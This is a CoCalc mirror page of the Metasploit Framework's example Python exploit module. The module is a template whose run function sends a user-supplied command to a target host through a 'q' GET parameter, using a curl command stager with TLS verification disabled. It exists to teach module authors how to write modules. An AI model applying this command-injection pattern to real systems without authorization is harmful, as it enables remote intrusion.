CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/example.py
Views: 1904
1
#!/usr/bin/env python3

2
# -*- coding: utf-8 -*-

3


4
# standard modules

5
import logging

6


7
# extra modules

8
dependencies_missing = False

9
try:

10
    import requests

11
except ImportError:

12
    dependencies_missing = True

13


14
from metasploit import module

15


16


17
metadata = {

18
    'name': 'Python Module Example',

19
    'description': '''

20
        Python communication with msfconsole.

21
    ''',

22
    'authors': [

23
        'Jacob Robles'

24
    ],

25
    'date': '2018-03-22',

26
    'license': 'MSF_LICENSE',

27
    'references': [

28
        {'type': 'url', 'ref': 'https://www.rapid7.com/blog/post/2017/12/28/regifting-python-in-metasploit/'},

29
        {'type': 'aka', 'ref': 'Coldstone'}

30
    ],

31
    'type': 'remote_exploit_cmd_stager',

32
    'targets': [

33
      {'platform':'linux', 'arch': 'x86'}

34
    ],

35
    'payload': {

36
        'command_stager_flavor': 'curl',

37
    },

38
    'options': {

39
        'targeturi': {'type': 'string', 'description': 'The base path', 'required': True, 'default': '/'},

40
        'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None},

41
        'command': {'type': 'string', 'description': 'The command to execute via the q GET parameter', 'required': True}

42
    }

43
}

44


45


46
def run(args):

47
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))

48
    if dependencies_missing:

49
        logging.error('Module dependency (requests) is missing, cannot continue')

50
        return

51


52
    # Your code here

53
    try:

54
        # args['command'] is where the command stager command lives

55
        r = requests.get('https://{}/{}/?q={}'.format(args['rhost'], args['targeturi'], args['command']), verify=False)

56
    except requests.exceptions.RequestException as e:

57
        logging.error('{}'.format(e))

58
        return

59


60
    logging.info('{}...'.format(r.text[0:50]))

61


62


63
if __name__ == '__main__':

64
    module.run(metadata, run)

65


66